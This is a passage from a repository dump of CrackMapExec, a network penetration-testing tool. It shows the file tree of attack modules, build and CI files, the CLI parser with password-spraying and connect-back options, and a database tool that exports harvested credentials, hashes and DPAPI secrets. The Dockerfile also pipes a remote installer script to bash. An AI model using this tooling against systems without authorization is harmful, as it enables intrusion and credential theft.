Repository: byt3bl33d3r/CrackMapExec
Branch: master
Commit: 3c3e412193cb
Files: 194
Total size: 2.9 MB
Directory structure:
gitextract_1_y4acn_/
├── .dockerignore
├── .github/
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── workflows/
│ ├── crackmapexec-test.yml
│ └── crackmapexec.yml
├── .gitignore
├── .gitmodules
├── Dockerfile
├── LICENSE
├── Makefile
├── README.md
├── build_collector.py
├── cme/
│ ├── .hooks/
│ │ └── hook-lsassy.py
│ ├── __init__.py
│ ├── cli.py
│ ├── cmedb.py
│ ├── config.py
│ ├── connection.py
│ ├── console.py
│ ├── context.py
│ ├── crackmapexec.py
│ ├── data/
│ │ ├── cme.conf
│ │ ├── default.pem
│ │ ├── keepass_trigger_module/
│ │ │ ├── AddKeePassTrigger.ps1
│ │ │ ├── RemoveKeePassTrigger.ps1
│ │ │ └── RestartKeePass.ps1
│ │ ├── msol_dump/
│ │ │ └── msol_dump.ps1
│ │ ├── veeam_dump_module/
│ │ │ ├── veeam_dump_mssql.ps1
│ │ │ └── veeam_dump_postgresql.ps1
│ │ └── wmiexec_event_vbscripts/
│ │ ├── Exec_Command_Silent.vbs
│ │ └── Exec_Command_WithOutput.vbs
│ ├── first_run.py
│ ├── helpers/
│ │ ├── __init__.py
│ │ ├── bash.py
│ │ ├── bloodhound.py
│ │ ├── http.py
│ │ ├── logger.py
│ │ ├── misc.py
│ │ ├── msada_guids.py
│ │ └── powershell.py
│ ├── loaders/
│ │ ├── __init__.py
│ │ ├── moduleloader.py
│ │ └── protocolloader.py
│ ├── logger.py
│ ├── modules/
│ │ ├── IOXIDResolver.py
│ │ ├── MachineAccountQuota.py
│ │ ├── adcs.py
│ │ ├── add_computer.py
│ │ ├── appcmd.py
│ │ ├── bh_owned.py
│ │ ├── daclread.py
│ │ ├── dfscoerce.py
│ │ ├── drop-sc.py
│ │ ├── empire_exec.py
│ │ ├── enum_av.py
│ │ ├── enum_dns.py
│ │ ├── example_module.py
│ │ ├── find-computer.py
│ │ ├── firefox.py
│ │ ├── get-desc-users.py
│ │ ├── get_netconnections.py
│ │ ├── gpp_autologin.py
│ │ ├── gpp_password.py
│ │ ├── group_members.py
│ │ ├── groupmembership.py
│ │ ├── handlekatz.py
│ │ ├── hash_spider.py
│ │ ├── impersonate.py
│ │ ├── install_elevated.py
│ │ ├── keepass_discover.py
│ │ ├── keepass_trigger.py
│ │ ├── laps.py
│ │ ├── ldap-checker.py
│ │ ├── lsassy_dump.py
│ │ ├── masky.py
│ │ ├── met_inject.py
│ │ ├── ms17-010.py
│ │ ├── msol.py
│ │ ├── mssql_priv.py
│ │ ├── nanodump.py
│ │ ├── nopac.py
│ │ ├── ntdsutil.py
│ │ ├── ntlmv1.py
│ │ ├── petitpotam.py
│ │ ├── pi.py
│ │ ├── printnightmare.py
│ │ ├── procdump.py
│ │ ├── pso.py
│ │ ├── rdcman.py
│ │ ├── rdp.py
│ │ ├── reg-query.py
│ │ ├── runasppl.py
│ │ ├── scan-network.py
│ │ ├── scuffy.py
│ │ ├── shadowcoerce.py
│ │ ├── slinky.py
│ │ ├── spider_plus.py
│ │ ├── spooler.py
│ │ ├── subnets.py
│ │ ├── teams_localdb.py
│ │ ├── test_connection.py
│ │ ├── trust.py
│ │ ├── uac.py
│ │ ├── user_desc.py
│ │ ├── veeam_dump.py
│ │ ├── wcc.py
│ │ ├── wdigest.py
│ │ ├── web_delivery.py
│ │ ├── webdav.py
│ │ ├── whoami.py
│ │ ├── winscp_dump.py
│ │ ├── wireless.py
│ │ └── zerologon.py
│ ├── parsers/
│ │ ├── __init__.py
│ │ ├── ip.py
│ │ ├── nessus.py
│ │ └── nmap.py
│ ├── paths.py
│ ├── protocols/
│ │ ├── __init__.py
│ │ ├── ftp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ftp.py
│ │ ├── ldap/
│ │ │ ├── __init__.py
│ │ │ ├── bloodhound.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── gmsa.py
│ │ │ ├── kerberos.py
│ │ │ ├── laps.py
│ │ │ └── proto_args.py
│ │ ├── ldap.py
│ │ ├── mssql/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── mssqlexec.py
│ │ │ └── proto_args.py
│ │ ├── mssql.py
│ │ ├── rdp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── rdp.py
│ │ ├── smb/
│ │ │ ├── __init__.py
│ │ │ ├── atexec.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── firefox.py
│ │ │ ├── mmcexec.py
│ │ │ ├── passpol.py
│ │ │ ├── proto_args.py
│ │ │ ├── remotefile.py
│ │ │ ├── samrfunc.py
│ │ │ ├── samruser.py
│ │ │ ├── smbexec.py
│ │ │ ├── smbspider.py
│ │ │ └── wmiexec.py
│ │ ├── smb.py
│ │ ├── ssh/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ssh.py
│ │ ├── vnc/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── vnc.py
│ │ ├── winrm/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── winrm.py
│ │ ├── wmi/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── proto_args.py
│ │ │ ├── wmiexec.py
│ │ │ └── wmiexec_event.py
│ │ └── wmi.py
│ └── servers/
│ ├── __init__.py
│ ├── http.py
│ └── smb.py
├── crackmapexec.spec
├── flake.nix
├── pyproject.toml
├── shell.nix
└── tests/
├── README.md
├── data/
│ ├── test_key.priv
│ ├── test_passwords.txt
│ └── test_users.txt
├── e2e_commands.txt
├── e2e_test.py
└── test_smb_database.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .dockerignore
================================================
tests
Dockerfile
*.pyc
*.pyo
*.pyd
__pycache__
.vscode
.venv
.github
build
bin
dist
*.egg-info
cme/data/powersploit/Recon/Dictionaries
cme/data/powersploit/Exfiltration/NTFSParser
cme/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources
cme/data/powersploit/Exfiltration/LogonUser
cme/data/powersploit/Tests
cme/data/netripper/DLL
cme/data/netripper/Metasploit
cme/data/netripper/NetRipper
cme/data/netripper/Win32
cme/data/netripper/Release
cme/data/netripper/minhook
cme/data/netripper/x64
cme/data/netripper/*.pdf
cme/data/netripper/*.sln
cme/data/invoke-vnc/winvnc
cme/data/invoke-vnc/vncdll
cme/data/invoke-vnc/pebytes.ps1
cme/data/invoke-vnc/ReflectiveDLLInjection
cme/data/invoke-vnc/*.py
cme/data/invoke-vnc/*.bat
cme/data/invoke-vnc/*.msbuild
cme/data/invoke-vnc/*.sln
cme/data/RID-Hijacking/modules
cme/data/RID-Hijacking/slides
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior i.e.:
Command: `crackmapexec smb -u username -p password`
Resulted in:
```
crackmapexec smb 10.10.10.10 -u username -p password -x "whoami"
SMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC01 [+] domain\username:password
Traceback (most recent call last):
...
```
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Crackmapexec info**
- OS: [e.g. Kali]
- Version of CME [e.g. v5.0.2]
- Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
**Additional context**
Add any other context about the problem here.
================================================
FILE: .github/workflows/crackmapexec-test.yml
================================================
name: CrackMapExec Tests
on:
workflow_dispatch:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
build:
name: CrackMapExec Tests for Py${{ matrix.python-version }}
runs-on: ${{ matrix.os }}
strategy:
max-parallel: 4
matrix:
os: [ubuntu-latest]
python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
steps:
- uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Install poetry
run: |
pipx install poetry --python python${{ matrix.python-version }}
poetry --version
poetry env info
- name: Install librairies with dev group
run: |
poetry install --with dev
- name: Run the e2e test
run: |
poetry run pytest tests
================================================
FILE: .github/workflows/crackmapexec.yml
================================================
name: CrackMapExec Tests & Build
on:
workflow_dispatch:
branches: [ main ]
push:
branches: [ main ]
pull_request:
branches: [ main ]
jobs:
build:
name: CrackMapExec Tests on ${{ matrix.os }}
runs-on: ${{ matrix.os }}
strategy:
max-parallel: 4
matrix:
os: [ubuntu-latest, macOS-latest, windows-latest]
python-version: ["3.8", "3.9", "3.10", "3.11"]
steps:
- uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Build binaries with Shiv
run: |
pip install shiv
python build_collector.py
- name: Upload cme binary
uses: actions/upload-artifact@master
with:
name: cme-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cme
- name: Upload cmedb binary
uses: actions/upload-artifact@master
with:
name: cmedb-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cmedb
================================================
FILE: .gitignore
================================================
data/cme.db
*.bak
*.log
.venv
.vscode
.idea
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
bin/
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
!crackmapexec.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
================================================
FILE: .gitmodules
================================================
================================================
FILE: Dockerfile
================================================
FROM python:3.11-slim
ENV LANG=C.UTF-8
ENV LC_ALL=C.UTF-8
ENV PIP_NO_CACHE_DIR=off
WORKDIR /usr/src/crackmapexec
RUN apt-get update && \
apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git
RUN apt-get update
# Get Rust
RUN curl https://sh.rustup.rs -sSf | bash -s -- -y
# Add .cargo/bin to PATH
ENV PATH="/root/.cargo/bin:${PATH}"
# Check cargo is visible
RUN cargo --help
COPY . .
RUN pip install .
ENTRYPOINT [ "cme" ]
================================================
FILE: LICENSE
================================================
Copyright (c) 2022, byt3bl33d3r, mpgn_x64
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: Makefile
================================================
.PHONY: tests
default: build
clean:
rm -f -r build/
rm -f -r bin/
rm -f -r dist/
find . -name '*.pyc' -exec rm -f {} +
find . -name '*.pyo' -exec rm -f {} +
find . -name '*~' -exec rm -f {} +
find . -name '__pycache__' -exec rm -rf {} +
find . -name '.pytest_cache' -exec rm -rf {} +
tests:
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude cme/data/*
requirements:
poetry export --without-hashes -f requirements.txt -o requirements.txt
poetry export --without-hashes --dev -f requirements.txt -o requirements-dev.txt
================================================
FILE: README.md
================================================
# No Longer Maintained
This project is no longer mantained due to the existence of a hostile fork.
# CrackMapExec
You are on the **latest up-to-date** repository of the project CrackMapExec ! 🎉
- 🚧 If you want to report a problem, open un [Issue](https://github.com/mpgn/CrackMapExec/issues)
- 🔀 If you want to contribute, open a [Pull Request](https://github.com/mpgn/CrackMapExec/pulls)
- 💬 If you want to discuss, open a [Discussion](https://github.com/mpgn/CrackMapExec/discussions)
# Acknowledgments
**(These are the people who did the hard stuff)**
This project was originally inspired by:
- [CredCrack](https://github.com/gojhonny/CredCrack)
- [smbexec](https://github.com/pentestgeek/smbexec)
- [smbmap](https://github.com/ShawnDEvans/smbmap)
Unintentional contributors:
- The [Empire](https://github.com/PowerShellEmpire/Empire) project
- @T-S-A's [smbspider](https://github.com/T-S-A/smbspider) script
- @ConsciousHacker's partial Python port of Invoke-obfuscation from the [GreatSCT](https://github.com/GreatSCT/GreatSCT) project
# Documentation, Tutorials, Examples
See the project's [wiki](https://www.crackmapexec.wiki/) for documentation and usage examples
# Installation
Please see the installation instructions on the [official wiki](https://www.crackmapexec.wiki/getting-started/installation)
# Code Contributors
Awesome code contributors of CME:
[](https://github.com/Marshall-Hallenbeck)
[](https://github.com/zblurx)
[](https://github.com/NeffIsBack)
[](https://github.com/Hackndo)
[](https://github.com/nurfed1)
# To do
- ~~0wn everything~~
================================================
FILE: build_collector.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import shutil
import subprocess
import sys
import time
from datetime import datetime
from pathlib import Path
from shiv.bootstrap import Environment
# from distutils.ccompiler import new_compiler
from shiv.builder import create_archive
from shiv.cli import __version__ as VERSION
def build_cme():
print("building CME")
try:
shutil.rmtree("bin")
shutil.rmtree("build")
except Exception as e:
pass
try:
print("remove useless files")
os.mkdir("build")
os.mkdir("bin")
shutil.copytree("cme", "build/cme")
except Exception as e:
print(e)
return
subprocess.run(
[
sys.executable,
"-m",
"pip",
"install",
"-e",
".",
"-t",
"build",
],
check=True,
)
# [shutil.rmtree(p) for p in Path("build").glob("**/__pycache__")]
[shutil.rmtree(p) for p in Path("build").glob("**/*.dist-info")]
env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.crackmapexec:main",
script=None,
compile_pyc=False,
extend_pythonpath=True,
shiv_version=VERSION,
)
create_archive(
[Path("build").absolute()],
Path("bin/cme"),
"/usr/bin/env -S python -sE",
"_bootstrap:bootstrap",
env,
True,
)
def build_cmedb():
print("building CMEDB")
env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.cmedb:main",
script=None,
compile_pyc=False,
extend_pythonpath=True,
shiv_version=VERSION,
)
create_archive(
[Path("build").absolute()],
Path("bin/cmedb"),
"/usr/bin/env -S python -sE",
"_bootstrap:bootstrap",
env,
True,
)
if __name__ == "__main__":
try:
build_cme()
build_cmedb()
except:
pass
finally:
shutil.rmtree("build")
================================================
FILE: cme/.hooks/hook-lsassy.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from PyInstaller.utils.hooks import collect_all
datas, binaries, hiddenimports = collect_all("lsassy")
================================================
FILE: cme/__init__.py
================================================
================================================
FILE: cme/cli.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
from argparse import RawTextHelpFormatter
from cme.loaders.protocolloader import ProtocolLoader
from cme.helpers.logger import highlight
from termcolor import colored
from cme.logger import cme_logger
import importlib.metadata
def gen_cli_args():
VERSION = importlib.metadata.version("crackmapexec")
CODENAME = "John Wick"
parser = argparse.ArgumentParser(description=f"""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks
Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes
{highlight('Version', 'red')} : {highlight(VERSION)}
{highlight('Codename', 'red')}: {highlight(CODENAME)}
""",
formatter_class=RawTextHelpFormatter,
)
parser.add_argument(
"-t",
type=int,
dest="threads",
default=100,
help="set how many concurrent threads to use (default: 100)",
)
parser.add_argument(
"--timeout",
default=None,
type=int,
help="max timeout in seconds of each thread (default: None)",
)
parser.add_argument(
"--jitter",
metavar="INTERVAL",
type=str,
help="sets a random delay between each connection (default: None)",
)
parser.add_argument(
"--no-progress",
action="store_true",
help="Not displaying progress bar during scan",
)
parser.add_argument("--verbose", action="store_true", help="enable verbose output")
parser.add_argument("--debug", action="store_true", help="enable debug level information")
parser.add_argument("--version", action="store_true", help="Display CME version")
# we do module arg parsing here so we can reference the module_list attribute below
module_parser = argparse.ArgumentParser(add_help=False)
mgroup = module_parser.add_mutually_exclusive_group()
mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use")
module_parser.add_argument(
"-o",
metavar="MODULE_OPTION",
nargs="+",
default=[],
dest="module_options",
help="module options",
)
module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules")
module_parser.add_argument(
"--options",
dest="show_module_options",
action="store_true",
help="display module options",
)
module_parser.add_argument(
"--server",
choices={"http", "https"},
default="https",
help="use the selected server (default: https)",
)
module_parser.add_argument(
"--server-host",
type=str,
default="0.0.0.0",
metavar="HOST",
help="IP to bind the server to (default: 0.0.0.0)",
)
module_parser.add_argument(
"--server-port",
metavar="PORT",
type=int,
help="start the server on the specified port",
)
module_parser.add_argument(
"--connectback-host",
type=str,
metavar="CHOST",
help="IP for the remote system to connect back to (default: same as server-host)",
)
subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols")
std_parser = argparse.ArgumentParser(add_help=False)
std_parser.add_argument(
"target",
nargs="+" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else "*",
type=str,
help="the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)",
)
std_parser.add_argument(
"-id",
metavar="CRED_ID",
nargs="+",
default=[],
type=str,
dest="cred_id",
help="database credential ID(s) to use for authentication",
)
std_parser.add_argument(
"-u",
metavar="USERNAME",
dest="username",
nargs="+",
default=[],
help="username(s) or file(s) containing usernames",
)
std_parser.add_argument(
"-p",
metavar="PASSWORD",
dest="password",
nargs="+",
default=[],
help="password(s) or file(s) containing passwords",
)
std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication")
std_parser.add_argument("--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2")
std_parser.add_argument("--continue-on-success", action="store_true", help="continues authentication attempts even after successes")
std_parser.add_argument(
"--use-kcache",
action="store_true",
help="Use Kerberos authentication from ccache file (KRB5CCNAME)",
)
std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file")
std_parser.add_argument(
"--aesKey",
metavar="AESKEY",
nargs="+",
help="AES key to use for Kerberos Authentication (128 or 256 bits)",
)
std_parser.add_argument(
"--kdcHost",
metavar="KDCHOST",
help="FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter",
)
fail_group = std_parser.add_mutually_exclusive_group()
fail_group.add_argument(
"--gfail-limit",
metavar="LIMIT",
type=int,
help="max number of global failed login attempts",
)
fail_group.add_argument(
"--ufail-limit",
metavar="LIMIT",
type=int,
help="max number of failed login attempts per username",
)
fail_group.add_argument(
"--fail-limit",
metavar="LIMIT",
type=int,
help="max number of failed login attempts per host",
)
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
for protocol in protocols.keys():
try:
protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
except:
cme_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.version:
print(f"{VERSION} - {CODENAME}")
sys.exit(1)
return args
================================================
FILE: cme/cmedb.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cmd
import configparser
import csv
import os
from os import listdir
from os.path import exists
from os.path import join as path_join
import shutil
from sqlite3 import connect
import sys
from textwrap import dedent
from requests import get, post, ConnectionError
from sqlalchemy import create_engine
from terminaltables import AsciiTable
from cme.loaders.protocolloader import ProtocolLoader
from cme.paths import CONFIG_PATH, WS_PATH, WORKSPACE_DIR
class UserExitedProto(Exception):
pass
def create_db_engine(db_path):
db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
return db_engine
def print_table(data, title=None):
print("")
table = AsciiTable(data)
if title:
table.title = title
print(table.table)
print("")
def write_csv(filename, headers, entries):
"""
Writes a CSV file with the provided parameters.
"""
with open(os.path.expanduser(filename), "w") as export_file:
csv_file = csv.writer(
export_file,
delimiter=";",
quoting=csv.QUOTE_ALL,
lineterminator="\n",
escapechar="\\",
)
csv_file.writerow(headers)
for entry in entries:
csv_file.writerow(entry)
def write_list(filename, entries):
"""
Writes a file with a simple list
"""
with open(os.path.expanduser(filename), "w") as export_file:
for line in entries:
export_file.write(line + "\n")
return
def complete_import(text, line):
"""
Tab-complete 'import' commands
"""
commands = ("empire", "metasploit")
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_export(text, line):
"""
Tab-complete 'creds' commands.
"""
commands = (
"creds",
"plaintext",
"hashes",
"shares",
"local_admins",
"signing",
"keys",
)
mline = line.partition(" ")[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def print_help(help_string):
print(dedent(help_string))
class DatabaseNavigator(cmd.Cmd):
def __init__(self, main_menu, database, proto):
cmd.Cmd.__init__(self)
self.main_menu = main_menu
self.config = main_menu.config
self.proto = proto
self.db = database
self.prompt = f"cmedb ({main_menu.workspace})({proto}) > "
def do_exit(self, line):
self.db.shutdown_db()
sys.exit()
@staticmethod
def help_exit():
help_string = """
Exits
"""
print_help(help_string)
def do_back(self, line):
raise UserExitedProto
def do_export(self, line):
if not line:
print("[-] not enough arguments")
return
line = line.split()
command = line[0].lower()
# Need to use if/elif/else to keep compatibility with py3.8/3.9
# Reference DB Function cme/protocols/smb/database.py
# Users
if command == "creds":
if len(line) < 3:
print("[-] invalid arguments, export creds ")
return
filename = line[2]
creds = self.db.get_credentials()
csv_header = (
"id",
"domain",
"username",
"password",
"credtype",
"pillaged_from",
)
if line[1].lower() == "simple":
write_csv(filename, csv_header, creds)
elif line[1].lower() == "detailed":
formatted_creds = []
for cred in creds:
entry = [
cred[0], # ID
cred[1], # Domain
cred[2], # Username
cred[3], # Password/Hash
cred[4], # Cred Type
]
if cred[5] is None:
entry.append("")
else:
entry.append(self.db.get_hosts(cred[5])[0][2])
formatted_creds.append(entry)
write_csv(filename, csv_header, formatted_creds)
elif line[1].lower() == "hashcat":
usernames = []
passwords = []
for cred in creds:
if cred[4] == "hash":
usernames.append(cred[2])
passwords.append(cred[3])
output_list = [':'.join(combination) for combination in zip(usernames, passwords)]
write_list(filename, output_list)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Creds exported")
# Hosts
elif command == "hosts":
if len(line) < 3:
print("[-] invalid arguments, export hosts ")
return
csv_header_simple = (
"id",
"ip",
"hostname",
"domain",
"os",
"dc",
"smbv1",
"signing",
)
csv_header_detailed = (
"id",
"ip",
"hostname",
"domain",
"os",
"dc",
"smbv1",
"signing",
"spooler",
"zerologon",
"petitpotam",
)
filename = line[2]
if line[1].lower() == "simple":
hosts = self.db.get_hosts()
simple_hosts = [host[:8] for host in hosts]
write_csv(filename, csv_header_simple, simple_hosts)
# TODO: maybe add more detail like who is an admin on it, shares discovered, etc
elif line[1].lower() == "detailed":
hosts = self.db.get_hosts()
write_csv(filename, csv_header_detailed, hosts)
elif line[1].lower() == "signing":
hosts = self.db.get_hosts("signing")
signing_hosts = [host[1] for host in hosts]
write_list(filename, signing_hosts)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Hosts exported")
# Shares
elif command == "shares":
if len(line) < 3:
print("[-] invalid arguments, export shares ")
return
shares = self.db.get_shares()
csv_header = ("id", "host", "userid", "name", "remark", "read", "write")
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, shares)
print("[+] shares exported")
# Detailed view gets hostname, usernames, and true false statement
elif line[1].lower() == "detailed":
formatted_shares = []
for share in shares:
user = self.db.get_users(share[2])[0]
if self.db.get_hosts(share[1]):
share_host = self.db.get_hosts(share[1])[0][2]
else:
share_host = "ERROR"
entry = (
share[0], # shareID
share_host, # hosts
f"{user[1]}\{user[2]}", # userID
share[3], # name
share[4], # remark
bool(share[5]), # read
bool(share[6]), # write
)
formatted_shares.append(entry)
write_csv(filename, csv_header, formatted_shares)
print("[+] Shares exported")
else:
print(f"[-] No such export option: {line[1]}")
return
# Local Admin
elif command == "local_admins":
if len(line) < 3:
print("[-] invalid arguments, export local_admins ")
return
# These values don't change between simple and detailed
local_admins = self.db.get_admin_relations()
csv_header = ("id", "userid", "host")
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, local_admins)
elif line[1].lower() == "detailed":
formatted_local_admins = []
for entry in local_admins:
user = self.db.get_users(filter_term=entry[1])[0]
formatted_entry = (
entry[0], # Entry ID
f"{user[1]}/{user[2]}", # DOMAIN/Username
self.db.get_hosts(filter_term=entry[2])[0][2], # Hostname
)
# Can't modify a tuple which is what self.db.get_admin_relations() returns
formatted_local_admins.append(formatted_entry)
write_csv(filename, csv_header, formatted_local_admins)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] Local Admins exported")
elif command == "dpapi":
if len(line) < 3:
print("[-] invalid arguments, export dpapi ")
return
# These values don't change between simple and detailed
dpapi_secrets = self.db.get_dpapi_secrets()
csv_header = (
"id",
"host",
"dpapi_type",
"windows_user",
"username",
"password",
"url",
)
filename = line[2]
if line[1].lower() == "simple":
write_csv(filename, csv_header, dpapi_secrets)
elif line[1].lower() == "detailed":
formatted_dpapi_secret = []
for entry in dpapi_secrets:
formatted_entry = (
entry[0], # Entry ID
self.db.get_hosts(filter_term=entry[1])[0][2], # Hostname
entry[2], # DPAPI type
entry[3], # Windows User
entry[4], # Username
entry[5], # Password
entry[6], # URL
)
# Can't modify a tuple which is what self.db.get_admin_relations() returns
formatted_dpapi_secret.append(formatted_entry)
write_csv(filename, csv_header, formatted_dpapi_secret)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] DPAPI secrets exported")
elif command == "keys":
if line[1].lower() == "all":
keys = self.db.get_keys()
else:
keys = self.db.get_keys(key_id=int(line[1]))
writable_keys = [key[2] for key in keys]
filename = line[2]
write_list(filename, writable_keys)
elif command == "wcc":
if len(line) < 3:
print("[-] invalid arguments, export wcc ")
return
csv_header_simple = (
"id",
"ip",
"hostname",
"check",
"status",
)
csv_header_detailed = (
"id",
"ip",
"hostname",
"check",
"description",
"status",
"reasons"
)
filename = line[2]
host_mapping = {}
check_mapping = {}
hosts = self.db.get_hosts()
checks = self.db.get_checks()
check_results = self.db.get_check_results()
rows = []
for result_id,hostid,checkid,secure,reasons in check_results:
row = [result_id]
if hostid in host_mapping:
row.extend(host_mapping[hostid])
else:
for host_id,ip,hostname,_,_,_,_,_,_,_,_ in hosts:
if host_id == hostid:
row.extend([ip, hostname])
host_mapping[hostid] = [ip, hostname]
break
if checkid in check_mapping:
row.extend(check_mapping[checkid])
else:
for check in checks:
check_id, name, description = check
if check_id == checkid:
row.extend([name, description])
check_mapping[checkid] = [name, description]
break
row.append('OK' if secure else 'KO')
row.append(reasons)
rows.append(row)
if line[1].lower() == "simple":
simple_rows = list((row[0], row[1], row[2], row[3], row[5]) for row in rows)
write_csv(filename, csv_header_simple, simple_rows)
elif line[1].lower() == "detailed":
write_csv(filename, csv_header_detailed, rows)
elif line[1].lower() == "signing":
hosts = self.db.get_hosts("signing")
signing_hosts = [host[1] for host in hosts]
write_list(filename, signing_hosts)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] WCC exported")
else:
